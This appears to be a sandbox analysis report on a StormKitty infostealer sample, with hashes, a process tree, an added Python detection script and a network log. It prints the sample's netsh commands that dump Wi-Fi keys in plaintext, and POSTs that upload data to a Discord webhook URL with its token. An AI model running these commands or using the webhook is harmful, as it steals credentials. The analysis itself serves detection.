Analysis

  • max time kernel
    436s
  • max time network
    441s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05/05/2024, 17:25 UTC

General

  • Target

    BlitzedGrabberV12/Resources/yhyty5.exe

  • Size

    59KB

  • MD5

    9b1283f4b90fa0009ea6fda13596a584

  • SHA1

    1daa7ccfddc6da823c2fadb7b821a9e26efebabe

  • SHA256

    4e3ff2595fc8b32fb44856e856b6d91600fd6a66ab556bc2437a926bf7c8fdb0

  • SHA512

    ca6d46254da5c16f80a3ee4a5d11b7203a025082e8268ba8ff343a6b705262e03c8c149e381ec038b364ebecb8a5ab4169e6e5fb3676d90abe37aecf468d1ecb

  • SSDEEP

    768:uvlq4ltFkHOCROyDZSCY6LaIdB4b2iuAPGdX3oI0fZOv11cEL6N9Q5WEpGl:I84l4XROyDL3AEo41BLg9Qg6y

Malware Config

Signatures

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and autofill entries.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BlitzedGrabberV12\Resources\yhyty5.exe
    "C:\Users\Admin\AppData\Local\Temp\BlitzedGrabberV12\Resources\yhyty5.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1320
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
        PID:2960
      • C:\Windows\system32\netsh.exe
        netsh wlan show profile
        3⤵
        PID:1012
      • C:\Windows\system32\findstr.exe
        findstr All
        3⤵
        PID:2544
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile name=65001 key=clear | findstr Key
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4000
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
        PID:3140
      • C:\Windows\system32\netsh.exe
        netsh wlan show profile name=65001 key=clear
        3⤵
        PID:4596
      • C:\Windows\system32\findstr.exe
        findstr Key
        3⤵
        PID:2100
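The two cmd.exe children are the sample's Wi-Fi credential harvest: first enumerate saved profiles, then ask netsh for a profile with key=clear, which prints the pre-shared key in plaintext. The profile name in the second stage is 65001, the UTF-8 code page set by chcp, not a real SSID: the sandbox evidently had no saved Wi-Fi profiles, so the only text the stealer had to parse was chcp's own "Active code page: 65001" line. The example below is added for this page (it is not StormKitty's source and not a tria.ge signature): it classifies constructed process-creation records modelled on this tree, and shows a naive colon-split parser, our assumption about how the output was consumed, producing exactly the second-stage command seen above.

```python
"""Detection logic and artifact reproduction for the netsh Wi-Fi credential
harvest in the process tree above. Added example written for this page; it is
neither StormKitty's source nor a tria.ge signature. Records are constructed
from the report's command lines plus one benign contrast case."""
import re

# Constructed process-creation records (parent image, image, command line),
# in the shape of Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    ("yhyty5.exe", "cmd.exe",
     '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    ("cmd.exe", "netsh.exe", "netsh wlan show profile"),
    ("yhyty5.exe", "cmd.exe",
     '"cmd.exe" /C chcp 65001 && netsh wlan show profile name=65001 key=clear | findstr Key'),
    ("cmd.exe", "netsh.exe", "netsh wlan show profile name=65001 key=clear"),
    ("explorer.exe", "cmd.exe", '"cmd.exe" /C chcp 65001 && dir'),  # benign
]

# key=clear makes netsh print the pre-shared key in plaintext; enumeration
# without it is weaker evidence but is the stage that always precedes it.
KEY_CLEAR_RE = re.compile(
    r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear\b", re.I)
ENUM_RE = re.compile(r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b", re.I)


def classify(parent, image, cmdline):
    """Severity for one record: 'high' (key requested), 'medium'
    (profile enumeration) or None."""
    if KEY_CLEAR_RE.search(cmdline):
        return "high"
    if ENUM_RE.search(cmdline):
        return "medium"
    return None


def scan(events):
    """Return (severity, parent, cmdline) for every record worth alerting on.
    The parent is carried through so an analyst can see that cmd.exe was
    spawned by the sample rather than by an interactive shell."""
    hits = []
    for parent, image, cmdline in events:
        sev = classify(parent, image, cmdline)
        if sev:
            hits.append((sev, parent, cmdline))
    return hits


# Why the second stage asks for a profile literally named 65001:
# in cmd.exe, '|' binds tighter than '&&', so
#     chcp 65001 && netsh wlan show profile | findstr All
# runs as chcp 65001 && (netsh ... | findstr All). chcp's own output is
# not filtered by findstr and reaches the parent unchanged. With no saved
# Wi-Fi profiles the captured text is just chcp's line (constructed below).
NO_PROFILES_OUTPUT = "Active code page: 65001\r\n"
ONE_PROFILE_OUTPUT = ("Active code page: 65001\r\n"
                      "    All User Profile     : HomeNet\r\n")


def parse_profile_names(output):
    """Naive 'take whatever follows the colon' parser. This is our assumption
    about the kind of parsing that yields name=65001, not code taken from
    the stealer; its flaw is treating every colon line as a profile."""
    return [line.split(":", 1)[1].strip()
            for line in output.splitlines() if ":" in line]


def key_dump_commands(names):
    """Second-stage command lines such a parser would go on to run."""
    return [f"netsh wlan show profile name={name} key=clear" for name in names]


if __name__ == "__main__":
    for sev, parent, cmd in scan(SAMPLE_EVENTS):
        print(f"[{sev}] parent={parent} cmd={cmd}")
    print(key_dump_commands(parse_profile_names(NO_PROFILES_OUTPUT)))
```

The key=clear pattern is the one to alert on; plain enumeration is common in admin scripts, so weigh it by who spawned cmd.exe. The "chcp 65001 &&" prefix followed by netsh is a useful hunting pivot for stealers built on the same code, but on its own it is not proof.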

              Network

              • flag-us
                DNS
                228.249.119.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                228.249.119.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                172.210.232.199.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                172.210.232.199.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                api.anonfiles.com
                yhyty5.exe
                Remote address:
                8.8.8.8:53
                Request
                api.anonfiles.com
                IN A
                Response
              • flag-us
                DNS
                discord.com
                yhyty5.exe
                Remote address:
                8.8.8.8:53
                Request
                discord.com
                IN A
                Response
                discord.com
                IN A
                162.159.136.232
                discord.com
                IN A
                162.159.137.232
                discord.com
                IN A
                162.159.128.233
                discord.com
                IN A
                162.159.135.232
                discord.com
                IN A
                162.159.138.232
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: multipart/form-data; boundary="4485b9fa-3702-4913-b4fd-e7f1a0633c0d"
                Host: discord.com
                Content-Length: 184
                Expect: 100-continue
                Connection: Keep-Alive
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:06 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b21bff640b0411ef8d4c7a68abf1e1c0; Expires=Fri, 04-May-2029 17:27:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 3
                x-ratelimit-reset: 1714930028
                x-ratelimit-reset-after: 1
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBmrt9B9Q5V9iu1JCS6smHb%2FXD%2BCffRjXBtAwkwmD40lyhYXEnXqbrCo%2BBmTMJBki3fe%2BMQfeKupszMzQYl36XyN7NLvRNRxGoq0dmfwg0J5Z4sdmgvuVrHYCyRs"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b21bff640b0411ef8d4c7a68abf1e1c00e728e38df9ec6ee295d85097c74145c6a5249dc845f5a82a5923e9b2bff4570; Expires=Fri, 04-May-2029 17:27:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=b07806c3fc5874a07dabfb679aec46f1194abbc1-1714930026; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=pVpuamaPmODqUt0zMw9otWiMmOzCQMXxVac.08qxzkQ-1714930026819-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f2707a1d0994e5-LHR
              • flag-us
                DNS
                69.31.126.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                69.31.126.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                95.221.229.192.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                95.221.229.192.in-addr.arpa
                IN PTR
                Response
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: multipart/form-data; boundary="8319d677-239a-4f2b-9974-9e71a474b5dd"
                Host: discord.com
                Content-Length: 190
                Expect: 100-continue
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:07 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b28aec300b0411ef8fb4862707142480; Expires=Fri, 04-May-2029 17:27:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 4
                x-ratelimit-reset: 1714930028
                x-ratelimit-reset-after: 1
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FMQmEHPQ6Ix8UytP7w48pjQKNS3%2B8wTqNOCjsCWxUK1%2FZ8UgNpUubtyaghlalQJf2iLIpwItbMoPnXHlJsQCSNXa%2FsLJEytGhYsFnfG6ObmLWxI3bAVa5JryNPUV"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b28aec300b0411ef8fb48627071424805b19606086e3e24250863ba38d20e5fd4d0eb067fd968bcb27061a74bd07cad2; Expires=Fri, 04-May-2029 17:27:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=b652c2cb531cc49e0748ee28aaf53d0e1e76045c-1714930027; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=Csd.TLg2y97w7BUZsLJsXmfnvDJ3ejS1bL0KGMfIGms-1714930027553-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f2707e6ff376c6-LHR
              • flag-us
                DNS
                232.136.159.162.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                232.136.159.162.in-addr.arpa
                IN PTR
                Response
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: multipart/form-data; boundary="b34aac3a-b218-4f8a-9190-ad8b6980411a"
                Host: discord.com
                Content-Length: 83603
                Expect: 100-continue
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:09 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b36d3a860b0411ef9e526a6e51ca1ba9; Expires=Fri, 04-May-2029 17:27:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 1
                x-ratelimit-reset: 1714930031
                x-ratelimit-reset-after: 2
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DomkIePpGZ9xN3orkenBp5PTpKfFCzoeKDn3Gr1Kmum8fGw0594IZkvIq2fqiSkDleMqN33L9cl1jJA%2FpwzTC3Gyp6WUPr0dBT1ehX%2FuR53SI7y%2FGMWuX8aYSx2"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b36d3a860b0411ef9e526a6e51ca1ba997370d15598158666daefef1e36c51ab710143eafb70652f2e7ab68a8152b82c; Expires=Fri, 04-May-2029 17:27:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=04c81bb8906c9a1a65c6daf0755e4f214aac0a1c-1714930029; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=mtI0ZztPB.epURNB.MiD_b3pKITtHcaDRy_ehD9IWfA-1714930029032-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f27087ea2c77ac-LHR
              • flag-us
                POST
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                yhyty5.exe
                Remote address:
                162.159.136.232:443
                Request
                POST /api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna HTTP/1.1
                Content-Type: application/json; charset=utf-8
                Host: discord.com
                Content-Length: 1697
                Expect: 100-continue
                Response
                HTTP/1.1 404 Not Found
                Date: Sun, 05 May 2024 17:27:09 GMT
                Content-Type: application/json
                Content-Length: 45
                Connection: keep-alive
                set-cookie: __dcfduid=b3a5623a0b0411ef8f129aa54c010af6; Expires=Fri, 04-May-2029 17:27:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                x-ratelimit-limit: 5
                x-ratelimit-remaining: 1
                x-ratelimit-reset: 1714930031
                x-ratelimit-reset-after: 2
                via: 1.1 google
                alt-svc: h3=":443"; ma=86400
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jh9NAE%2B1ShdE1LfjPFP9L%2Bbb8LXOEPbRMe8YmWydF%2BMhg26jJDmEgu5flwLAG4JkkdWqcKWvVuZeaeYZspz7sJjrZAQ%2BbNNcHxzRhmnPX%2BIjSPmD%2FQz5is182sQl"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                X-Content-Type-Options: nosniff
                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                Set-Cookie: __sdcfduid=b3a5623a0b0411ef8f129aa54c010af657a5db5956bb13f1f5c73939b7283f14ef6656a897da103a3b3cdb7b1543ae08; Expires=Fri, 04-May-2029 17:27:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                Set-Cookie: __cfruid=04c81bb8906c9a1a65c6daf0755e4f214aac0a1c-1714930029; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Set-Cookie: _cfuvid=nchSI96sQ_DXc3bsE0CG5fWFv6MWaI.WO2T7wWny0xU-1714930029398-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                Server: cloudflare
                CF-RAY: 87f2708ac9ec6325-LHR
              • flag-us
                DNS
                86.23.85.13.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                86.23.85.13.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                171.39.242.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                171.39.242.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                17.14.97.104.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                17.14.97.104.in-addr.arpa
                IN PTR
                Response
                17.14.97.104.in-addr.arpa
                IN PTR
                a104-97-14-17.deploy.static.akamaitechnologies.com
              • flag-us
                DNS
                0.205.248.87.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                0.205.248.87.in-addr.arpa
                IN PTR
                Response
                0.205.248.87.in-addr.arpa
                IN PTR
                https-87-248-205-0.lgw.llnw.net
              • flag-us
                DNS
                26.35.223.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                26.35.223.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                tse1.mm.bing.net
                Remote address:
                8.8.8.8:53
                Request
                tse1.mm.bing.net
                IN A
                Response
                tse1.mm.bing.net
                IN CNAME
                mm-mm.bing.net.trafficmanager.net
                mm-mm.bing.net.trafficmanager.net
                IN CNAME
                dual-a-0001.a-msedge.net
                dual-a-0001.a-msedge.net
                IN A
                204.79.197.200
                dual-a-0001.a-msedge.net
                IN A
                13.107.21.200
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 468637
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: BE5C8E78D5DE445D8F65C4BF8920CC48 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 555746
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 6FE464FA5EA2459A96075C63C52CDAE9 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 638730
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 0088002D17D445F8A124635CD618B932 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                204.79.197.200:443
                Request
                GET /th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 449656
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 5B9DC93D066F467FB27B69139E316201 Ref B: LON04EDGE1110 Ref C: 2024-05-05T17:28:08Z
                date: Sun, 05 May 2024 17:28:08 GMT
              • flag-us
                DNS
                48.229.111.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                48.229.111.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                g.bing.com
                Remote address:
                8.8.8.8:53
                Request
                g.bing.com
                IN A
                Response
                g.bing.com
                IN CNAME
                g-bing-com.dual-a-0034.a-msedge.net
                g-bing-com.dual-a-0034.a-msedge.net
                IN CNAME
                dual-a-0034.a-msedge.net
                dual-a-0034.a-msedge.net
                IN A
                204.79.197.237
                dual-a-0034.a-msedge.net
                IN A
                13.107.21.237
              • flag-us
                GET
                https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE; domain=.bing.com; expires=Fri, 30-May-2025 17:28:40 GMT; path=/; SameSite=None; Secure; Priority=High;
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: AE83041B237E405390E64C9F080DAEC6 Ref B: LON04EDGE0717 Ref C: 2024-05-05T17:28:40Z
                date: Sun, 05 May 2024 17:28:39 GMT
              • flag-us
                GET
